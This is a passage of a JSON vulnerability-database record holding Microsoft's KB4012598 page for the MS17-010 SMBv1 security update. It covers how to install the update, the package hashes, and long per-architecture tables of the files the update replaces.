"928d79ba-72eb-762f-39be-122173e95922", "fd3a2888-0af1-3691-5303-bc85b4302e62", "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "2b2eeb95-d89c-6614-0db5-88f09133ede6"], "supportAreaPathNodes": [{"id": "c2628421-ad67-7b37-cbb2-c1b1f4d4ffab", "name": "Windows Server 2008 Datacenter", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "fd3a2888-0af1-3691-5303-bc85b4302e62", "name": "Windows Vista Home Premium", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, 
{"id": "0d05b8b1-ed59-2bf9-9d27-07c0db1c697f", "name": "Windows Vista Service Pack 2", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "f62ed778-6986-d76e-c007-40a28315ffbf", "name": "Windows Server 2008 Enterprise", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2b2eeb95-d89c-6614-0db5-88f09133ede6", "name": "Windows Server 2008 Foundation", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "c5c603fd-204f-4b8a-f0fb-cc95767cb3a7", "name": "Windows Server 2008 for Itanium-Based Systems", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "371fbe0b-cb79-c748-a47a-4dc327bf6944", "name": "Windows Vista Business", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9d95d170-7d1a-675a-ebb1-ab4cd0b095f1", "name": "Windows Vista Home Basic", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "928d79ba-72eb-762f-39be-122173e95922", "name": "Windows Vista Starter", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "333f3bd9-9578-fda0-5919-4b8fa39524c3", "name": "Windows Server 2008 Standard", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "2bcc8288-b2b0-9ff3-3992-cc01f9c21619", "name": "Windows Vista Enterprise", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "417fd093-b60f-5bcc-5ffe-121d73da4b0c", "name": "Windows Vista Ultimate", "parent": "981df833-4c7c-ed03-d59a-3c7c3d2e7074", "tree": [], "type": "productversion"}, {"id": "adc0290c-cf74-ece3-6c50-40b4b8ac2454", "name": "Windows 
Server 2008 Web Edition", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}], "primarySupportAreaPath": [{"id": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "name": "Windows Server 2008", "parent": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "tree": [], "type": "productname"}, {"id": "9dcd1ae8-74ee-a4f0-82ad-4736ad0727f7", "name": "Windows Server 2008 Service Pack 2", "parent": "4d83ba0e-5ad3-1b00-4303-1863823d2178", "tree": [], "type": "productversion"}, {"id": "7ff57180-2b05-67aa-2c03-ab46c7848b89", "name": "Windows Servers", "tree": [], "type": "productfamily"}]}, "lastseen": "2019-10-05T22:48:35", "differentElements": ["cvelist", "cvss", "mscve"], "edition": 1}, {"bulletin": {"id": "KB4012598", "vendorId": null, "hash": "d86a4742bbfb67c9b27c83e8de1bfb42cc7a6d12f2fd7b5fa1288284e1ac290a", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Description of the security update for Windows SMB Server: March 14, 2017", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/><br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important <br/><br/></span><ul class=\"sbody-free_list\"> <li>If you install a language pack after you install this update, you must reinstall this update. 
Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Get security updates automatically</a>. <br/><br/></div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\" http://catalog.update.microsoft.com/v7/site/search.aspx?q=4012598\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. 
<br/></div></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span></span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><formatting type=\"H3\">File hash information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 
hash</th></tr><tr><td>Windows6.0-KB4012598-ia64.msu</td><td>83A6F5A70588B27623B11C42F1C8124A25D489DE</td><td>29B40D7E75186A9CCC9F2F309417E374846F35F41B4D1DE6DBE85F439DC1837F</td></tr><tr><td>Windows6.0-KB4012598-x64.msu</td><td>6A186BA2B2B98B2144B50F88BAF33A5FA53B5D76</td><td>A91A0AF728225FF2A630B9ABA4E639473AA8ABE7CAA23BE10AE48A7887BDE9C8</td></tr><tr><td>Windows6.0-KB4012598-x86.msu</td><td>13E9B3D77BA5599764C296075A796C16A85C745C</td><td>FC7F28A72C117C2A8ECE5916532048C8BF3379C86386348C24319EAC2C6B23C8</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H3\">File information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><boilerplate boilerplatename=\"QFEFileAttributes\" version=\"7\">The English (United States) version of this software update installs files that have the attributes that are listed in the following tables.</boilerplate><formatting type=\"H4\">Windows Vista and Windows Server 2008 file information</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><formatting type=\"B\">Notes: </formatting>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.<br/><br/><formatting type=\"H5\">For all supported ia64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong 
class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>15:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:01</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>16:55</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:14</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:23</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:35</td><td>IA-64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:16</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>297,984</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>297,984</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>967,168</td><td>11-Feb-2017</td><td>15:31</td><td>IA-64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>969,216</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>468,480</td><td>03-Aug-2016</td><td>14:20</td><td>IA-64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>474,624</td><td>11-Feb-2017</td><td>15:22</td><td>IA-64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_end_collapsed.png\"></pathlink><br/><br/><formatting type=\"H5\">For all supported x64-based versions</formatting><br/><br/><pathlink type=\"Graphic\" value=\"http://support.microsoft.com/library/images/support/en-US/assets_folding_start_collapsed.png\"></pathlink><table class=\"table\"><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>233,984</td><td>03-Aug-2016</td><td>17:08</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>239,104</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>289,792</td><td>03-Aug-2016</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>16:23</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>263,168</td><td>03-Aug-2016</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:05</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,848</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>144,384</td><td>03-Aug-2016</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>137,216</td><td>03-Aug-2016</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>229,376</td><td>03-Aug-2016</td><td>17:16</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,952</td><td>03-Aug-2016</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>248,320</td><td>03-Aug-2016</td><td>17:02</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>253,440</td><td>03-Aug-2016</td><td>17:09</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>261,120</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,152</td><td>03-Aug-2016</td><td>17:11</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>231,936</td><td>03-Aug-2016</td><td>17:10</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>230,912</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>99,840</td><td>03-Aug-2016</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>101,376</td><td>03-Aug-2016</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>233,984</td><td>11-Feb-2017</td><td>17:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>239,104</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:26</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>289,792</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>16:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>263,168</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:25</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,848</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:42</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:36</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>144,384</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>137,216</td><td>11-Feb-2017</td><td>17:41</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>229,376</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,952</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>248,320</td><td>11-Feb-2017</td><td>17:37</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>253,440</td><td>11-Feb-2017</td><td>17:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>261,120</td><td>11-Feb-2017</td><td>17:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,152</td><td>11-Feb-2017</td><td>17:34</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>231,936</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>230,912</td><td>11-Feb-2017</td><td>17:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>99,840</td><td>11-Feb-2017</td><td>17:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>101,376</td><td>11-Feb-2017</td><td>17:33</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>16:23</td><td>x64</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:41</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srvnet.sys</td><td>6.0.6002.24067</td><td>147,968</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.19743</td><td>448,512</td><td>11-Feb-2017</td><td>15:48</td><td>x64</td></tr><tr><td>Srv.sys</td><td>6.0.6002.24067</td><td>448,000</td><td>11-Feb-2017</td><td>15:44</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.19673</td><td>176,128</td><td>03-Aug-2016</td><td>14:40</td><td>x64</td></tr><tr><td>Srv2.sys</td><td>6.0.6002.24067</td><td>178,176</td><td>11-Feb-2017</td><td>15:43</td><td>x64</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:22</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:20</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>299,008</td><td>03-Aug-2016</td><td>16:28</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>15:44</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>274,432</td><td>03-Aug-2016</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:29</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>278,528</td><td>03-Aug-2016</td><td>16:19</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>155,648</td><td>03-Aug-2016</td><td>16:38</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>147,456</td><td>03-Aug-2016</td><td>16:31</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>237,568</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>258,048</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>262,144</td><td>03-Aug-2016</td><td>16:40</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>270,336</td><td>03-Aug-2016</td><td>16:32</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>249,856</td><td>03-Aug-2016</td><td>16:33</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>241,664</td><td>03-Aug-2016</td><td>16:35</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:39</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.19673</td><td>110,592</td><td>03-Aug-2016</td><td>16:27</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:05</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>17:09</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>299,008</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>16:19</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>274,432</td><td>11-Feb-2017</td><td>17:08</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>278,528</td><td>11-Feb-2017</td><td>16:57</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:03</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>155,648</td><td>11-Feb-2017</td><td>16:53</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>147,456</td><td>11-Feb-2017</td><td>17:00</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>237,568</td><td>11-Feb-2017</td><td>17:06</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>258,048</td><td>11-Feb-2017</td><td>16:49</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>262,144</td><td>11-Feb-2017</td><td>17:17</td><td>Not 
applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>270,336</td><td>11-Feb-2017</td><td>17:12</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>249,856</td><td>11-Feb-2017</td><td>17:21</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:07</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>241,664</td><td>11-Feb-2017</td><td>17:18</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:15</td><td>Not applicable</td></tr><tr><td>Netevent.dll.mui</td><td>6.0.6002.24067</td><td>110,592</td><td>11-Feb-2017</td><td>17:04</td><td>Not applicable</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.19673</td><td>17,920</td><td>03-Aug-2016</td><td>15:45</td><td>x86</td></tr><tr><td>Netevent.dll</td><td>6.0.6002.24067</td><td>17,920</td><td>11-Feb-2017</td><td>16:17</td><td>x86</td></tr></table><pathlink type=\"Graphic\" 